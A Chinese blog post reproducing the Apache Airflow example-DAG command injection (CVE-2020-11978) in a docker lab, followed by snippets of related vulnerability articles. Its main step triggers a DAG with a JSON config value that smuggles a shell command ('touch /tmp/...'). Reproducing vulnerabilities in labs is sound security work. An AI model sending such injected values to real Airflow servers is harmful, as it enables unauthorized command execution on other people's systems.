Apache Airflow 命令注入 (CVE-2020-11978)漏洞复现

于 2023-11-08 11:22:30 发布
阅读量167 收藏
点赞数
文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/134284220
版权

漏洞描述

Apache Airflow 是一个开源的分布式任务调度框架。在 1.10.10 之前的版本中,示例 DAG 中存在一个命令注入漏洞,该漏洞导致攻击者在工作进程中执行任意命令。

漏洞环境及利用

搭建docker环境

访问8080端口,并打开标志:http://your-ip:8080example_trigger_target_dag

单击右侧的“triger”按钮,然后输入带有构建有效负载的配置 JSON:{"message":"'\";touch /tmp/airflow_dag_success;#"}

 这里遇到一个小问题,这里一直处于running状态,把这个开关打开就行了

sudo docker-compose exec airflow-worker ls -l /tmp

 

blackK_YC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
airflow CVE-2020-11978 漏洞分析
示例和笔记
06-08 532
CVE-2020-11978漏洞的一个示例是发现在Apache Airflow示例dag文件存在命令注入漏洞。攻击者可以通过该漏洞Airflow服务器上执行恶意命令。具体来说,该漏洞源于示例dag文件的一个BashOperator任务,它执行了一个echo命令并将输出写入文件。该任务通过 {{ ds }} 参数接收当前日期作为参数,并在命令行上执行。然而,该任务并没有对 ds 参数进行严格的验证和过滤,因此攻击者可以通过注入恶意命令来执行任意命令
Apache Airflow Celery 消息间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
漏洞复现----48、Airflow dag命令注入(CVE-2020-11978)
七天
07-04 1544
Airflow dag命令注入(CVE-2020-11978)
CVE-2022-24288:Apache Airflow OS命令注入漏洞复现
热爱学习,喜欢折腾!
08-24 1892
Apache Airflow 2.2.4 之前的版本,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。............
漏洞复现——Apache Airflow 示例dag命令注入CVE-2020-11978
m0_65149086的博客
05-26 436
懵逼日常
CVE-2020-11978Airflow dag命令注入漏洞复现【vulhub靶场】
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
06-18 3296
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker执行任意命令。基于vulhub靶场的CVE-2020-11978漏洞复现airflow dag命令注入RCE和反弹shell教学。漏洞复现。......
Python库 | apache-airflow-providers-apache-spark-2.1.3.tar.gz
04-06
资源分类:Python库 所属语言:Python 资源全名:apache-airflow-providers-apache-spark-2.1.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
PyPI 官网下载 | apache-airflow-providers-apache-hive-1.0.0b2.tar.gz
01-31
标题的"PyPI 官网下载 | apache-airflow-providers-apache-hive-1.0.0b2.tar.gz"表明这是一个从Python Package Index (PyPI)官方源下载的软件包,具体是Apache Airflow的一个提供者包,用于与Apache Hive进行集成...
airflow-client-go:Apache Airflow-Go的OpenApi客户端
05-17
"github.com/apache/airflow-client-go/airflow" ) func main () { cli := airflow . NewAPIClient ( & airflow. Configuration { Scheme : "http" , Host : "localhost:8080" , BasePath : "/api/v1" , })...
Python库 | apache-airflow-providers-docker-1.0.1.tar.gz
05-12
资源分类:Python库 所属语言:Python 资源全名:apache-airflow-providers-docker-1.0.1.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
漏洞复现----49、Apache Airflow 身份验证绕过 (CVE-2020-17526)
七天
07-06 2774
Apache Airflow 身份验证绕过 (CVE-2020-17526)
Apache Airflow 示例dag命令注入(CVE-2020-11978)
weixin_44047654的博客
11-29 770
Apache Airflow 示例dag命令注入(CVE-2020-11978)
Apache Airflow 示例dag命令注入CVE-2020-11978
Rin_CSDN
10-17 878
进入airflow管理端,将。执行dag:即可攻击成功。
airflow CVE-2020-11978复现
weixin_46203741的博客
03-08 157
vulhub 漏洞复现apache airflow
Airflow dag命令注入漏洞(CVE-2020-11978)
m0_49025459的博客
10-31 183
进入CVE-2020-11978目录下,依次使用接下来的命令启动靶场访问漏洞地址:http://ip:8080 即可。
Apache Airflow Provider Sqoop 模块远程代码执行漏洞
murphysec的博客
03-01 360
Apache Airflow 是一个以编程方式管理 workflow 的平台,Sqoop 模块用于在 Hadoop 和结构化数据存储(例如关系数据库)之间高效传输大量数据。 apache-airflow-providers-apache-sqoop 3.1.1 之前版本,由于 SqoopHook 类创建 sqoop 连接时未对用户配置的 jar 文件进行过滤,有权修改 sqoop 连接配置(lib_jars 字段)的攻击者可上传恶意 jar 文件远程执行恶意代码。
Apache Airflow Docker Provider远程代码执行漏洞
bocco的博客
08-17 368
安全狗应急响应心监测到,Apache发布安全公告,修复了Apache Airflow Docker Provider的一个远程代码执行漏洞漏洞编号:CVE-2022-38362。
OSCS开源安全周报第 56 期:Apache Airflow Spark Provider 任意文件读取漏洞
最新发布
OSCS开源安全社区
08-21 1961
OSCS 社区共收录安全漏洞 3 个,公开漏洞值得关注的是 Apache NiFi 连接 URL 验证绕过漏洞(CVE-2023-40037)、PowerJob 未授权访问漏洞(CVE-2023-36106)、Apache Airflow Spark Provider 任意文件读取漏洞(CVE-2023-40272) 针对 NPM 、PyPI 仓库,共监测到 81 个不同版本的毒组件,其 NPM 组件包 mall-front-babel-directive 等携带远控木马,该系列的组件包具有持续性威胁行为
漏洞预警|Apache Airflow Hive Provider命令注入漏洞
LJQClqjc的博客
11-22 764
棱镜七彩安全预警
CVE-2020-11978
08-10
回答:CVE-2020-11978Apache Airflow的一个命令注入漏洞。根据引用提到的博文,漏洞可以通过复现来进行验证。要进行复现,可以使用vulhub靶场CVE-2020-11978文件夹,并按照指示输入相关命令启动docker-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值